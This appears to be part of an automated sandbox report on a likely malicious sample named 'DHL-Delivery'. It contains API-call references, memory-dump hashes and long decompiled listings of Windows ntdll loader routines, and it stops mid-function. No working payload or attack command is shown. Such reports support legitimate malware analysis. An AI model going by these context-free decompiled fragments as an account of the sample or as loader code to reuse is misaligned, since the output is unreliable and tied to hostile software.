                        Uniqueness Score: 0.01%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: d9a40da110f353ef003371691e59014806868850d0438cb2941cad94f381c71d
                        • Instruction ID: 540f87b2fefc2df52ed24371b611a7ad5ac78638364223803642f31856a20a7c
                        • Opcode Fuzzy Hash: d9a40da110f353ef003371691e59014806868850d0438cb2941cad94f381c71d
                        • Instruction Fuzzy Hash: 8D018EA5B85317A9DF30257140AA3FE1E43BE51B64FA01B66FC02D3242EE668984C253
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 520f0b2cf67b739046e0225c3429068caea7924f376e79da054d34f0421b9158
                        • Instruction ID: 6a6751ff20592ef4425cbfd0337137f63010dfcfc47b0512af2332c6a476c786
                        • Opcode Fuzzy Hash: 520f0b2cf67b739046e0225c3429068caea7924f376e79da054d34f0421b9158
                        • Instruction Fuzzy Hash: FDF0A2BA7C6357E9CF3035B540ED3EE2B83AC51E603900659FC02D3201EA738545C163
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 9ffd683a0c2ed2bfc1f65df5ac9fbe0acf60a720a79b9ed5b999a0dbaff3fdad
                        • Instruction ID: f3175ba202437ed15cf1f249a82df1366e2ab6f91ba89ab7323875e23fee80dc
                        • Opcode Fuzzy Hash: 9ffd683a0c2ed2bfc1f65df5ac9fbe0acf60a720a79b9ed5b999a0dbaff3fdad
                        • Instruction Fuzzy Hash: A7F0557AA86353DACB2079B681992DD2B93AC61EA07904199F803C3300EA32C646C5B3
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,005652B1,005653FC), ref: 005653C7
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 2de80237a2675273c824c40b7ceb527adcceca5768e4b6c6f6ff960e24da68fd
                        • Instruction ID: fa8489fd41ae7ab751905cc7bbc093eb4276f0f8d04f090401729b6be0b8e6e5
                        • Opcode Fuzzy Hash: 2de80237a2675273c824c40b7ceb527adcceca5768e4b6c6f6ff960e24da68fd
                        • Instruction Fuzzy Hash: 9CE0C238784702BCF6240C50AD9BFEE16155F90FC0F24481DBF49BA2C0A6D009549002
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,005652B1,005653FC), ref: 005653C7
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: c9744405fb262165574e55f36152400cdb7645d44a9e7bf0a61c6cda12ef2b09
                        • Instruction ID: 4370dd419fc526806501fcc60af9694308c747f53613ff767a1b9cfbdf233606
                        • Opcode Fuzzy Hash: c9744405fb262165574e55f36152400cdb7645d44a9e7bf0a61c6cda12ef2b09
                        • Instruction Fuzzy Hash: 89E0CD7D6927939DE3109CB5848ABC53622AF61B94F10406CFE05EB141F7B18616C176
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,005652B1,005653FC), ref: 005653C7
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 2e31f6c2cdc4e60279075db27f9e386934e4ce49f1fb1a49214215288b0e1d76
                        • Instruction ID: 93a01b05bfee774a62f6a54126bef9688b72b052bea310f34946de0bf6d2a468
                        • Opcode Fuzzy Hash: 2e31f6c2cdc4e60279075db27f9e386934e4ce49f1fb1a49214215288b0e1d76
                        • Instruction Fuzzy Hash: CEC012249407479CEB102A759C18BDF79044F527B1F54471D9EF4651D1965001658561
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 42f3d0e3a1521639c54f07997fa0eb797cd1b7ceea437475849e00ccabb03fa6
                        • Instruction ID: 16de8606a6b1580fb62b91bc56a893ec7a2224f292978766c05eeaaf8d3661c0
                        • Opcode Fuzzy Hash: 42f3d0e3a1521639c54f07997fa0eb797cd1b7ceea437475849e00ccabb03fa6
                        • Instruction Fuzzy Hash: 67B09276D424CACFE611E7645B08B1B7A066BD0B12FBAC272E2130641E4738C0D5F6B6
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Non-executed Functions

                        C-Code - Quality: 52%
                        			E1E0DBCE6(void* __ecx, void* __eflags) {
                        				signed int _v8;
                        				void* _v540;
                        				void* _v552;
                        				char _v780;
                        				char* _v784;
                        				char _v788;
                        				char _v792;
                        				intOrPtr _v804;
                        				char _v868;
                        				char* _v872;
                        				short _v874;
                        				char _v876;
                        				intOrPtr _v880;
                        				char _v892;
                        				void* _v896;
                        				void* _v900;
                        				void* _v904;
                        				void* _v908;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				short _t48;
                        				short _t49;
                        				void* _t52;
                        				signed char _t61;
                        				void* _t67;
                        				intOrPtr _t71;
                        				void* _t81;
                        				signed char _t85;
                        				void* _t99;
                        				void* _t100;
                        				void* _t102;
                        				void* _t103;
                        				signed int _t104;
                        				signed int _t106;
                        				signed int _t108;
                        
                        				_t108 = (_t106 & 0xfffffff8) - 0x374;
                        				_v8 =  *0x1e1d6360 ^ _t108;
                        				_t48 = 0x16;
                        				_v876 = _t48;
                        				_t96 =  &_v876;
                        				_t49 = 0x18;
                        				_v874 = _t49;
                        				_t99 = __ecx;
                        				_v872 = L"apphelp.dll";
                        				_v784 =  &_v780;
                        				_v788 = 0x1000000;
                        				_v780 = 0;
                        				_t52 = E1E0DBC98( &_v788,  &_v876, __eflags);
                        				_t110 = _t52;
                        				if(_t52 < 0) {
                        					_t85 =  *0x1e1ce7b0; // 0x0
                        					__eflags = _t85 & 0x00000003;
                        					if((_t85 & 0x00000003) == 0) {
                        						L12:
                        						__eflags = _t85 & 0x00000010;
                        						L15:
                        						if(__eflags != 0) {
                        							asm("int3");
                        						}
                        						L6:
                        						_t53 =  &_v780;
                        						if( &_v780 != _v784) {
                        							_t53 = E1E0DB4F0(_v784);
                        						}
                        						_pop(_t100);
                        						_pop(_t102);
                        						_pop(_t81);
                        						return E1E1225C0(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
                        					}
                        					_push(_t52);
                        					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
                        					_push(0);
                        					_push("LdrpInitShimEngine");
                        					_push(0xa12);
                        					L11:
                        					_push("minkernel\\ntdll\\ldrinit.c");
                        					E1E15BDA0();
                        					_t85 =  *0x1e1ce7b0; // 0x0
                        					_t108 = _t108 + 0x18;
                        					goto L12;
                        				}
                        				E1E0FA838(0, 0x4001,  &_v868);
                        				_t96 =  &_v872;
                        				_t103 = E1E0FAE6D( &_v792,  &_v872, _t110, 0,  &_v892);
                        				if(_v804 != 0) {
                        					E1E0E1EE0( &_v792, _v868);
                        				}
                        				_t112 = _t103;
                        				if(_t103 < 0) {
                        					_t61 =  *0x1e1ce7b0; // 0x0
                        					__eflags = _t61 & 0x00000003;
                        					if((_t61 & 0x00000003) != 0) {
                        						E1E15BDA0("minkernel\\ntdll\\ldrinit.c", 0xa25, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
                        						_t61 =  *0x1e1ce7b0; // 0x0
                        						_t108 = _t108 + 0x18;
                        					}
                        					__eflags = _t61 & 0x00000010;
                        					goto L15;
                        				} else {
                        					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
                        					 *0x1e1d0c10 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
                        					E1E10DCFF( *((intOrPtr*)(_t108 + 0xc)));
                        					E1E0FB42D(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
                        					_t67 = E1E0DC147( *((intOrPtr*)(_t108 + 0xc)), _t96, _t99, _t112);
                        					if(_t67 < 0) {
                        						_t85 =  *0x1e1ce7b0; // 0x0
                        						__eflags = _t85 & 0x00000003;
                        						if((_t85 & 0x00000003) == 0) {
                        							goto L12;
                        						}
                        						_push(_t67);
                        						_push("Getting the shim engine exports failed with status 0x%08lx\n");
                        						_push(0);
                        						_push("LdrpInitShimEngine");
                        						_push(0xa33);
                        						goto L11;
                        					}
                        					_t104 =  *0x1e1d4208; // 0x0
                        					_v880 = _t108 + 0x178;
                        					 *((intOrPtr*)(_t108 + 0x14)) = 0x2000000;
                        					_t96 =  *0x7ffe0330;
                        					_t71 =  *0x1e1d09c4; // 0x752c20
                        					asm("ror esi, cl");
                        					 *0x1e1d41e0(_t108 + 0x18, _t71 + 0x24, _t99, 0x20);
                        					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
                        						E1E0DBE3E(_v892);
                        						if(_v892 != _t108 + 0x178) {
                        							E1E0F4EC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v892);
                        						}
                        					}
                        					goto L6;
                        				}
                        			}

                        APIs
                        • RtlDebugPrintTimes.NTDLL ref: 1E0DBDF5
                          • Part of subcall function 1E0DBE3E: RtlDebugPrintTimes.NTDLL ref: 1E0DBEED
                          • Part of subcall function 1E0DBE3E: RtlDebugPrintTimes.NTDLL ref: 1E0DBF38
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: ,u$Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                        • API String ID: 3446177414-521726492
                        • Opcode ID: d60906ad360fa09f27204278032c5bfacee9d78a1e091b9ce7f44039e02c0e1f
                        • Instruction ID: 388803f4eb671ff070c845f8d72daefe0548107d6ed9461d6703a41aae7fa9ab
                        • Opcode Fuzzy Hash: d60906ad360fa09f27204278032c5bfacee9d78a1e091b9ce7f44039e02c0e1f
                        • Instruction Fuzzy Hash: D951BFB52087449BE720CF24C894B9F77E9FF84644F604A1DF99597290DB30EA84CB92
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 67%
                        			E1E0FAF50(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				void* _t67;
                        				intOrPtr _t70;
                        				intOrPtr _t79;
                        				signed int _t80;
                        				signed char _t81;
                        				intOrPtr _t87;
                        				intOrPtr _t90;
                        				intOrPtr _t99;
                        				char _t100;
                        				signed int _t101;
                        				signed int _t102;
                        				signed char _t105;
                        				signed int _t107;
                        				signed int _t110;
                        				intOrPtr _t115;
                        				intOrPtr _t117;
                        				intOrPtr _t118;
                        				intOrPtr _t123;
                        				intOrPtr _t124;
                        				intOrPtr _t129;
                        				signed int _t131;
                        				signed int _t132;
                        				void* _t135;
                        				void* _t136;
                        
                        				_push(0x68);
                        				_push(0x1e1b8b08);
                        				_t67 = E1E134384(__ebx, __edi, __esi);
                        				_t123 =  *[fs:0x18];
                        				_t99 =  *((intOrPtr*)(_t123 + 0x30));
                        				if( *0x1e1d0c68 != 0) {
                        					L19:
                        					return E1E1343C9(_t67);
                        				}
                        				_t101 =  *(_t99 + 0x10);
                        				 *((intOrPtr*)(_t135 - 0x30)) =  *((intOrPtr*)(_t101 + 0x40));
                        				_t70 =  *((intOrPtr*)(_t101 + 0x44));
                        				 *((intOrPtr*)(_t135 - 0x2c)) = _t70;
                        				_t102 =  *(_t99 + 0x10);
                        				if(( *(_t102 + 8) & 0x00000001) == 0) {
                        					 *((intOrPtr*)(_t135 - 0x2c)) = _t70 + _t102;
                        				}
                        				if(( *0x1e1ce7b0 & 0x00000005) != 0) {
                        					_push(_t135 - 0x30);
                        					E1E15BDA0("minkernel\\ntdll\\ldrinit.c", 0x17e1, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t123 + 0x20)));
                        					_t136 = _t136 + 0x1c;
                        				}
                        				 *0x1e1d0c6c =  *((intOrPtr*)(_t123 + 0x24));
                        				 *0x1e1d0c68 = 1;
                        				if( *0x1e1d14b0 != 0) {
                        					_t114 =  *0x7ffe0330;
                        					_t131 =  *0x1e1d41f8; // 0x0
                        					asm("ror esi, cl");
                        					_t132 = _t131 ^  *0x7ffe0330;
                        					_t102 = _t132;
                        					 *0x1e1d41e0(0x20);
                        					 *_t132();
                        				}
                        				_t79 =  *((intOrPtr*)(_t123 + 0xfb4));
                        				if(_t79 != 0) {
                        					_push(_t79);
                        					E1E103780(_t102, _t114);
                        				}
                        				if(( *0x1e1ce8fc & 0x00000002) == 0) {
                        					_t80 =  *(_t99 + 0x10);
                        					__eflags =  *(_t80 + 8) & 0x40000000;
                        					_t105 = _t102 & 0xffffff00 | ( *(_t80 + 8) & 0x40000000) == 0x00000000;
                        					__eflags =  *0x1e1d4234 & 0x00000001;
                        					_t81 = _t80 & 0xffffff00 | ( *0x1e1d4234 & 0x00000001) == 0x00000000;
                        					__eflags = _t81 & _t105;
                        					if((_t81 & _t105) == 0) {
                        						goto L7;
                        					}
                        					 *((char*)(_t135 - 0x19)) = 1;
                        					_t100 = 0;
                        					L15:
                        					_t87 =  *[fs:0x30];
                        					__eflags =  *0x1e1d1750;
                        					if( *0x1e1d1750 != 0) {
                        						__eflags =  *((intOrPtr*)(_t87 + 0x18)) - _t100;
                        						if( *((intOrPtr*)(_t87 + 0x18)) != _t100) {
                        							E1E15E641(_t106);
                        							 *0x1e1d1750 = _t100;
                        						}
                        					}
                        					__eflags =  *((char*)(_t135 - 0x19));
                        					if( *((char*)(_t135 - 0x19)) == 0) {
                        						E1E11A4E0(_t106);
                        					}
                        					_t67 = E1E11A09F();
                        					goto L19;
                        				}
                        				L7:
                        				_t100 = 0;
                        				_t106 = 0;
                        				 *((char*)(_t135 - 0x19)) = 0;
                        				_t124 =  *0x1e1d0c60; // 0x7863d0
                        				L8:
                        				if(_t124 != 0x1e1d0c5c) {
                        					_t18 = _t124 - 0x10; // 0x7863c0
                        					_t118 = _t18;
                        					 *((intOrPtr*)(_t135 - 0x24)) = _t118;
                        					_t20 = _t124 + 4; // 0x786740
                        					_t124 =  *_t20;
                        					 *((intOrPtr*)(_t135 - 0x20)) = _t124;
                        					_t22 = _t118 + 0x1c; // 0x6fd575c0
                        					_t90 =  *_t22;
                        					 *((intOrPtr*)(_t135 - 0x28)) = _t90;
                        					if(_t90 != 0 && ( *(_t118 + 0x34) & 0x00080000) != 0) {
                        						 *((intOrPtr*)(_t135 - 0x54)) = 0x24;
                        						 *((intOrPtr*)(_t135 - 0x50)) = 1;
                        						_t110 = 7;
                        						memset(_t135 - 0x4c, 0, _t110 << 2);
                        						_t136 = _t136 + 0xc;
                        						_t31 = _t118 + 0x48; // 0x0
                        						E1E0F8F70(_t135 - 0x54,  *_t31);
                        						 *((intOrPtr*)(_t135 - 4)) = _t100;
                        						_t129 =  *((intOrPtr*)(_t135 - 0x24));
                        						_t149 =  *((intOrPtr*)(_t129 + 0x3a)) - _t100;
                        						if( *((intOrPtr*)(_t129 + 0x3a)) != _t100) {
                        							E1E0FA920(0, _t129);
                        						}
                        						_push(1);
                        						_push(_t100);
                        						_t106 =  *((intOrPtr*)(_t135 - 0x28));
                        						E1E0ED3B7(_t100,  *((intOrPtr*)(_t135 - 0x28)),  *((intOrPtr*)(_t129 + 0x18)), _t129, 1, _t149);
                        						 *((intOrPtr*)(_t135 - 4)) = 0xfffffffe;
                        						_t124 =  *((intOrPtr*)(_t135 - 0x20));
                        						E1E0FB0FB();
                        					}
                        					goto L8;
                        				}
                        				_t115 =  *0x1e1d09c4; // 0x752c20
                        				__eflags =  *((intOrPtr*)(_t115 + 0x3a)) - _t100;
                        				if( *((intOrPtr*)(_t115 + 0x3a)) != _t100) {
                        					 *((intOrPtr*)(_t135 - 0x78)) = 0x24;
                        					 *((intOrPtr*)(_t135 - 0x74)) = 1;
                        					_t107 = 7;
                        					memset(_t135 - 0x70, 0, _t107 << 2);
                        					_t46 = _t115 + 0x48; // 0x0
                        					E1E0F8F70(_t135 - 0x78,  *_t46);
                        					 *((intOrPtr*)(_t135 - 4)) = 1;
                        					_t117 =  *0x1e1d09c4; // 0x752c20
                        					_t106 = 0;
                        					E1E0FA920(0, _t117);
                        					 *((intOrPtr*)(_t135 - 4)) = 0xfffffffe;
                        					E1E0FB104();
                        				}
                        				goto L15;
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: ,u$$$$$H+u$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                        • API String ID: 3446177414-72518636
                        • Opcode ID: 7c73592039a56482f68dc970b8b68a5ac7b6e6b1cac99eba38ba80c8e621b714
                        • Instruction ID: 92f710ced2a94428fd2bc55e608aa3d0d10cbee19f5e3f7cd891401a5c26be8e
                        • Opcode Fuzzy Hash: 7c73592039a56482f68dc970b8b68a5ac7b6e6b1cac99eba38ba80c8e621b714
                        • Instruction Fuzzy Hash: 4A51FF75A04295DFDB20CFA4C888B8DBBF2BF04358F248798D8116B295D734A9A5CF90
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 91%
                        			E1E115EB0(signed int _a4, intOrPtr _a8, char _a12, char _a16, char _a20, signed int* _a24, signed int _a28, unsigned int _a32, signed int* _a36, signed int* _a40) {
                        				signed int _v8;
                        				char _v14;
                        				char _v68;
                        				char _v70;
                        				char _v74;
                        				char _v76;
                        				signed int _v1680;
                        				char _v1681;
                        				char _v1682;
                        				signed int _v1688;
                        				signed int _v1692;
                        				signed int _v1696;
                        				signed int _v1700;
                        				signed int _v1704;
                        				signed int _v1708;
                        				signed int _v1712;
                        				char _v1716;
                        				signed int _v1720;
                        				signed int _v1724;
                        				signed int _v1728;
                        				signed int _v1732;
                        				signed int* _v1736;
                        				signed int _v1740;
                        				intOrPtr _v1744;
                        				intOrPtr _v1748;
                        				signed int _v1752;
                        				intOrPtr _v1756;
                        				intOrPtr _v1760;
                        				intOrPtr _v1764;
                        				intOrPtr _v1768;
                        				intOrPtr _v1772;
                        				intOrPtr _v1776;
                        				intOrPtr _v1780;
                        				intOrPtr _v1784;
                        				intOrPtr _v1788;
                        				intOrPtr _v1792;
                        				signed int* _v1796;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int* _t330;
                        				signed int _t331;
                        				void* _t332;
                        				signed int _t338;
                        				signed int _t339;
                        				signed int* _t342;
                        				void* _t344;
                        				signed int _t345;
                        				void* _t346;
                        				short _t347;
                        				signed int _t348;
                        				signed int _t351;
                        				void* _t358;
                        				short _t359;
                        				signed int _t361;
                        				void* _t365;
                        				void* _t367;
                        				signed char _t368;
                        				signed int _t369;
                        				void* _t371;
                        				void* _t372;
                        				signed int _t373;
                        				short _t374;
                        				signed short _t375;
                        				char _t377;
                        				char _t378;
                        				void* _t380;
                        				signed int _t383;
                        				signed int _t384;
                        				signed int _t385;
                        				void* _t390;
                        				signed short _t391;
                        				signed int _t392;
                        				intOrPtr* _t393;
                        				signed int _t400;
                        				intOrPtr* _t402;
                        				intOrPtr _t406;
                        				void* _t409;
                        				signed int _t410;
                        				signed int _t412;
                        				void* _t415;
                        				signed short* _t418;
                        				signed int _t419;
                        				signed short* _t424;
                        				void* _t426;
                        				void* _t427;
                        				signed int _t430;
                        				signed int _t432;
                        				signed int* _t434;
                        				signed int _t435;
                        				signed int _t436;
                        				char _t438;
                        				signed int _t440;
                        				signed int _t441;
                        				signed int _t444;
                        				signed int _t445;
                        				signed int _t446;
                        				void* _t452;
                        				void* _t453;
                        				signed short* _t454;
                        				signed short* _t455;
                        				signed short* _t459;
                        				signed int _t460;
                        				signed int _t461;
                        				signed int _t462;
                        				void* _t463;
                        				signed short _t465;
                        				signed int _t466;
                        				signed int _t469;
                        				signed int _t470;
                        				signed int _t471;
                        				signed short* _t479;
                        				signed int _t480;
                        				void* _t481;
                        				intOrPtr _t482;
                        				signed int _t483;
                        				intOrPtr _t484;
                        				signed int _t485;
                        				void* _t486;
                        				signed int _t487;
                        				signed int _t489;
                        				void* _t490;
                        				signed int _t491;
                        				signed int _t492;
                        				void* _t493;
                        				void* _t494;
                        				void* _t495;
                        				short _t496;
                        				signed int _t498;
                        				signed int _t500;
                        				void* _t503;
                        				void* _t504;
                        				void* _t505;
                        				short* _t509;
                        				signed int _t510;
                        				signed int _t511;
                        				short* _t515;
                        				short* _t516;
                        				signed int _t517;
                        				signed int _t518;
                        				signed int _t519;
                        				void* _t520;
                        
                        				_v8 =  *0x1e1d6360 ^ _t519;
                        				_v1704 = _v1704 & 0x00000000;
                        				_t330 = _a24;
                        				_t434 = _a40;
                        				_t510 = _a4;
                        				_v1752 = _t510;
                        				_v1692 = _t330;
                        				_v1796 = _a36;
                        				_v1736 = _t434;
                        				_a32 = _a32 >> 1;
                        				_v1760 = 0x25;
                        				_v1764 = 8;
                        				_v1768 = 0x30;
                        				_v1772 = 0x39;
                        				_v1756 = 0x21;
                        				_v1776 = 0x68;
                        				_v1780 = 0x77;
                        				_v1784 = 0x6c;
                        				_v1788 = 0xd;
                        				_v1792 = 0xa;
                        				_v1748 = 9;
                        				_v1744 = 0x20;
                        				_t491 = _a28;
                        				_v1728 = _t491;
                        				if(_t434 == 0) {
                        					L2:
                        					_t440 = _v1752;
                        					_t511 = _t491;
                        					_t492 = 0;
                        					_v1696 = _t511;
                        					_v1688 = _v1688 & 0;
                        					_t475 = _t440;
                        					_v1700 = 0;
                        					_v1724 = _t440;
                        					if(_a20 != 0 || _t330 == 0) {
                        						L4:
                        						_t441 = _a32;
                        						goto L5;
                        					} else {
                        						_t441 = _a32;
                        						if(_t434 != 0) {
                        							_t434[5] =  *_t330;
                        						}
                        						while(1) {
                        							L5:
                        							_t331 =  *_t475 & 0x0000ffff;
                        							if(_t331 == 0) {
                        								break;
                        							}
                        							_t475 = _t475 + 2;
                        							if(_t331 == _v1760) {
                        								_t445 =  *_t475 & 0x0000ffff;
                        								_v1740 = _t511;
                        								_push(0x30);
                        								if(_t445 - 0x31 > _v1764) {
                        									_pop(_t344);
                        									if(_t445 == _t344) {
                        										break;
                        									}
                        									if(_t445 == 0) {
                        										L70:
                        										_t332 = 0xc000000d;
                        										L20:
                        										return E1E1225C0(_t332, _t434, _v8 ^ _t519, _t475, _t492, _t511);
                        									}
                        									if(_t445 != 0x72) {
                        										if(_t445 != 0x6e) {
                        											if(_t445 != 0x74) {
                        												if(_t445 != 0x62) {
                        													if(_a12 == 0) {
                        														_t288 =  &_a32;
                        														 *_t288 = _a32 - 1;
                        														if( *_t288 < 0) {
                        															L175:
                        															if(_t434 != 0) {
                        																_t444 = _v1728;
                        																_t434[1] = _v1688;
                        																_t434[2] = _v1724 - _v1752 >> 1;
                        																_t338 = _v1700;
                        																_t434[3] = _t511;
                        																if(_t338 == 0) {
                        																	_t339 = _t338 | 0xffffffff;
                        																} else {
                        																	_t339 = _t338 - _t444 >> 1;
                        																}
                        																 *_t434 =  *_t434 | 0x00000001;
                        																_t434[4] = _t339;
                        															}
                        															L186:
                        															_t332 = 0x80000005;
                        															goto L20;
                        														}
                        														 *_t511 = _t445;
                        														_t441 = _a32;
                        														L153:
                        														_t511 = _t511 + 2;
                        														L154:
                        														_t475 = _t475 + 2;
                        														_v1680 = _t475;
                        														L50:
                        														_v1696 = _t511;
                        														if(_v1740 == 0) {
                        															L133:
                        															_t492 = 0;
                        															_t345 = 0;
                        															_v1700 = 0;
                        															L12:
                        															_v1688 = _t345;
                        															L13:
                        															_v1724 = _t475;
                        															if(_a8 == 0 || _a8 == 0xffffffff || _t345 < _a8) {
                        																continue;
                        															} else {
                        																L160:
                        																if(_t492 == 0) {
                        																	_t441 = _t441 - 2;
                        																	_a32 = _t441;
                        																	if(_t441 < 0) {
                        																		L173:
                        																		if(_t434 == 0) {
                        																			goto L186;
                        																		}
                        																		 *_t434 =  *_t434 | 0x00000002;
                        																		goto L175;
                        																	}
                        																	_t346 = 0xd;
                        																	 *_t511 = _t346;
                        																	_t515 = _t511 + 2;
                        																	_v1688 = _v1688 & 0x00000000;
                        																	_t347 = 0xa;
                        																	 *_t515 = _t347;
                        																	L183:
                        																	_t475 = _v1680;
                        																	_t492 = 0;
                        																	_t511 = _t515 + 2;
                        																	_v1700 = 0;
                        																	_v1696 = _t511;
                        																	continue;
                        																}
                        																_t446 = _t492;
                        																_t475 = 0x20;
                        																while(1) {
                        																	_t348 =  *_t446 & 0x0000ffff;
                        																	if(_t348 != _t475 && _t348 != _v1748) {
                        																		break;
                        																	}
                        																	_t446 = _t446 + 2;
                        																	if(_t446 != _t511) {
                        																		continue;
                        																	}
                        																	break;
                        																}
                        																if(_t492 <= _v1728) {
                        																	L171:
                        																	_t351 = _t446 - _t492 >> 1;
                        																	if(_t351 != 1) {
                        																		if(_t351 > 2) {
                        																			_a32 = _a32 + 0xfffffffe + _t351;
                        																		}
                        																		L180:
                        																		_v1688 = _t511 - _t446 >> 1;
                        																		L1E1266B0(_t492 + 4, _t446, (_t511 - _t446 >> 1) + (_t511 - _t446 >> 1));
                        																		_t441 = _a32;
                        																		_t520 = _t520 + 0xc;
                        																		_t358 = 0xd;
                        																		 *_t492 = _t358;
                        																		_t509 = _t492 + 2;
                        																		_t359 = 0xa;
                        																		 *_t509 = _t359;
                        																		_t515 = _t509 + _v1688 * 2;
                        																		goto L183;
                        																	}
                        																	_t303 =  &_a32;
                        																	 *_t303 = _a32 - _t351;
                        																	if( *_t303 >= 0) {
                        																		goto L180;
                        																	}
                        																	goto L173;
                        																}
                        																_t435 = _v1728;
                        																while(1) {
                        																	_t361 =  *(_t492 - 2) & 0x0000ffff;
                        																	if(_t361 != _v1744 && _t361 != _v1748) {
                        																		break;
                        																	}
                        																	_t492 = _t492 + 0xfffffffe;
                        																	if(_t492 > _t435) {
                        																		continue;
                        																	}
                        																	break;
                        																}
                        																_t434 = _v1736;
                        																_v1700 = _t492;
                        																goto L171;
                        															}
                        														}
                        														_v1688 = _v1688 + (_t511 - _v1740 >> 1);
                        														_t345 = _v1688;
                        														goto L13;
                        													}
                        													_t441 = _a32 - 2;
                        													_a32 = _t441;
                        													if(_t441 < 0) {
                        														goto L175;
                        													}
                        													_t365 = 0x25;
                        													 *_t511 = _t365;
                        													 *(_t511 + 2) =  *_t475;
                        													_t511 = _t511 + 4;
                        													goto L154;
                        												}
                        												_t441 = _a32 - 1;
                        												_a32 = _t441;
                        												if(_t441 < 0) {
